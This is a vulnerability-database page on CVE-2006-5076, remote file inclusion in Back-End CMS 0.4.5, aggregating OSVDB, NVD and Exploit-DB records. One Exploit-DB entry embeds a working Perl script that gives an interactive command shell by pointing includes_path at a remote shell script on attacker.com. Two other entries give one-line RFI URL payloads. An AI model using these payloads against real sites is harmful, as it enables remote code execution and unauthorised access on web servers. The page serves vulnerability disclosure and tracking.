ID OSVDB:32311
Type osvdb
Reporter OSVDB
Modified 2006-09-25T20:05:57
Description
No description provided by the source
References:
Related OSVDB ID: 32309
Related OSVDB ID: 32310
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0419.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0246.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0475.html
CVE-2006-5076
Bugtraq ID: 20207
{"bulletinFamily": "software", "viewCount": 0, "reporter": "OSVDB", "references": [], "description": "# No description provided by the source\n\n## References:\n[Related OSVDB ID: 32309](https://vulners.com/osvdb/OSVDB:32309)\n[Related OSVDB ID: 32310](https://vulners.com/osvdb/OSVDB:32310)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0419.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0246.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0475.html\n[CVE-2006-5076](https://vulners.com/cve/CVE-2006-5076)\nBugtraq ID: 20207\n", "affectedSoftware": [], "href": "https://vulners.com/osvdb/OSVDB:32311", "modified": "2006-09-25T20:05:57", "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2017-04-28T13:20:28", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-5076"]}, {"type": "exploitdb", "idList": ["EDB-ID:28674", "EDB-ID:28675", "EDB-ID:28676"]}, {"type": "osvdb", "idList": ["OSVDB:32310", "OSVDB:32309"]}], "modified": "2017-04-28T13:20:28", "rev": 2}, "vulnersScore": 6.3}, "id": "OSVDB:32311", "title": "Back-End search.php includes_path Variable Remote File Inclusion", "edition": 1, "published": "2006-09-25T20:05:57", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "cvelist": ["CVE-2006-5076"], "lastseen": "2017-04-28T13:20:28"}
{"cve": [{"lastseen": "2020-10-03T11:48:18", "description": "Multiple PHP remote file inclusion vulnerabilities in OpenConcept Back-End 0.4.5 allow remote attackers to execute arbitrary PHP code via a URL in the includes_path parameter in (1) admin/index.php, (2) Facts.php, or (3) search.php.", "edition": 3, "cvss3": {}, "published": "2006-09-29T00:07:00", "title": "CVE-2006-5076", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-5076"], "modified": "2018-10-17T21:41:00", "cpe": ["cpe:/a:back-end:back-end_cms:0.4.5"], "id": "CVE-2006-5076", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5076", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:back-end:back-end_cms:0.4.5:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "cvelist": ["CVE-2006-5076"], "description": "# No description provided by the source\n\n## References:\n[Related OSVDB ID: 32309](https://vulners.com/osvdb/OSVDB:32309)\n[Related OSVDB ID: 32311](https://vulners.com/osvdb/OSVDB:32311)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0419.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0246.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0475.html\n[CVE-2006-5076](https://vulners.com/cve/CVE-2006-5076)\nBugtraq ID: 20207\n", "edition": 1, "modified": "2006-09-25T20:05:57", "published": "2006-09-25T20:05:57", "href": "https://vulners.com/osvdb/OSVDB:32310", "id": "OSVDB:32310", "title": "Back-End Facts.php includes_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "cvelist": ["CVE-2006-5076"], "description": "# No description provided by the source\n\n## References:\n[Related OSVDB ID: 32311](https://vulners.com/osvdb/OSVDB:32311)\n[Related OSVDB ID: 32310](https://vulners.com/osvdb/OSVDB:32310)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0419.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0246.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0475.html\n[CVE-2006-5076](https://vulners.com/cve/CVE-2006-5076)\nBugtraq ID: 20207\n", "edition": 1, "modified": "2006-09-25T20:05:57", "published": "2006-09-25T20:05:57", "href": "https://vulners.com/osvdb/OSVDB:32309", "id": "OSVDB:32309", "title": "Back-End admin/index.php includes_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T08:40:51", "description": "Back-End CMS 0.4.5 admin/index.php includes_path Parameter Remote File Inclusion. CVE-2006-5076. Webapps exploit for php platform", "published": "2006-09-25T00:00:00", "type": "exploitdb", "title": "Back-End CMS 0.4.5 admin/index.php includes_path Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5076"], "modified": "2006-09-25T00:00:00", "id": "EDB-ID:28674", "href": "https://www.exploit-db.com/exploits/28674/", "sourceData": "source: http://www.securityfocus.com/bid/20207/info\r\n\r\nBack-End CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.\r\n\r\nA successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.\r\n\r\nBack-End CMS version 0.4.5 is vulnerable to these issues.\r\n\r\n#!/usr/bin/perl\r\n\r\n#################################################################\r\n# #\r\n# Back-end #\r\n# #\r\n# Class: Remote File Include Vulnerability #\r\n# #\r\n# Discovered By : Root3r_H3LL = |)\\0073|)\\_|-|311 #\r\n# #\r\n# Original Advisory : http://Www.PersainFox.coM #\r\n# #\r\n# Remote: Yes #\r\n# #\r\n# Type: high #\r\n# #\r\n# #\r\n#################################################################\r\n\r\n\r\nuse IO::Socket;\r\nuse LWP::Simple;\r\n\r\n$cmdshell=\"http://attacker.com/cmd.txt\"; # <====== Change This Line With Your Personal Script\r\n\r\nprint \"\\n\";\r\nprint \"#################################################################\\n\";\r\nprint \"# #\\n\";\r\nprint \"# Back-end => 0.4.5 Remote File Include Vulnerability #\\n\";\r\nprint \"# Bug found By : PerSianFox Security #\\n\";\r\nprint \"# Email: Root3r_H3LL Root3r_ir[at]yahoo.com #\\n\";\r\nprint \"# Web Site : Www.PerSianFox.coM #\\n\";\r\nprint \"# We ArE :Root3r_H3LL,Arashrj #\\n\";\r\nprint \"# #\\n\";\r\nprint \"# #\\n\";\r\nprint \"# </\\/\\\\/_ 10\\/3 15 1|)\\4/\\/ #\\n\";\r\nprint \"# #\\n\";\r\nprint \"#################################################################\\n\";\r\n\r\n\r\nif (@ARGV < 2)\r\n{\r\n print \"\\n Usage: Root3r.pl [host] [path] \";\r\n print \"\\n EX : Root3r.pl www.victim.com /[path]/ \\n\\n\";\r\nexit;\r\n}\r\n$host=$ARGV[0];\r\n$path=$ARGV[1];\r\n\r\nprint \"Type Your Commands ( uname -a )\\n\";\r\nprint \"For Exiit Type END\\n\";\r\n\r\nprint \"<Shell> \";$cmd = <STDIN>;\r\n\r\nwhile($cmd !~ \"END\") {\r\n $socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Could not connect to host.\\n\\n\";\r\n\r\n print $socket \"GET \".$path.\"/admin/index.php?includes_path=\".$cmdshell.\"?cmd=\".$cmd.\"? HTTP/1.1\\r\\n\";\r\n print $socket \"Host: \".$host.\"\\r\\n\";\r\n print $socket \"Accept: */*\\r\\n\";\r\n print $socket \"Connection: close\\r\\n\\n\";\r\n\r\n while ($raspuns = <$socket>)\r\n {\r\n print $raspuns;\r\n }\r\n\r\n print \"<Shell> \";\r\n $cmd = <STDIN>;\r\n}\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/28674/"}, {"lastseen": "2016-02-03T08:41:00", "description": "Back-End CMS 0.4.5 Facts.php includes_path Parameter Remote File Inclusion. CVE-2006-5076. Webapps exploit for php platform", "published": "2006-09-25T00:00:00", "type": "exploitdb", "title": "Back-End CMS 0.4.5 Facts.php includes_path Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5076"], "modified": "2006-09-25T00:00:00", "id": "EDB-ID:28675", "href": "https://www.exploit-db.com/exploits/28675/", "sourceData": "source: http://www.securityfocus.com/bid/20207/info\r\n \r\nBack-End CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.\r\n \r\nA successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.\r\n \r\nBack-End CMS version 0.4.5 is vulnerable to these issues.\r\n\r\nhttp://www.example.com/[Path]/Facts.php?includes_path=attacker's_file", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/28675/"}, {"lastseen": "2016-02-03T08:41:08", "description": "Back-End CMS 0.4.5 search.php includes_path Parameter Remote File Inclusion. CVE-2006-5076 . Webapps exploit for php platform", "published": "2006-09-25T00:00:00", "type": "exploitdb", "title": "Back-End CMS 0.4.5 - search.php includes_path Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5076"], "modified": "2006-09-25T00:00:00", "id": "EDB-ID:28676", "href": "https://www.exploit-db.com/exploits/28676/", "sourceData": "source: http://www.securityfocus.com/bid/20207/info\r\n \r\nBack-End CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.\r\n \r\nA successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.\r\n \r\nBack-End CMS version 0.4.5 is vulnerable to these issues.\r\n\r\nhttp://www.example.com/[Path]/search.php?includes_path=attacker's_file", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/28676/"}]}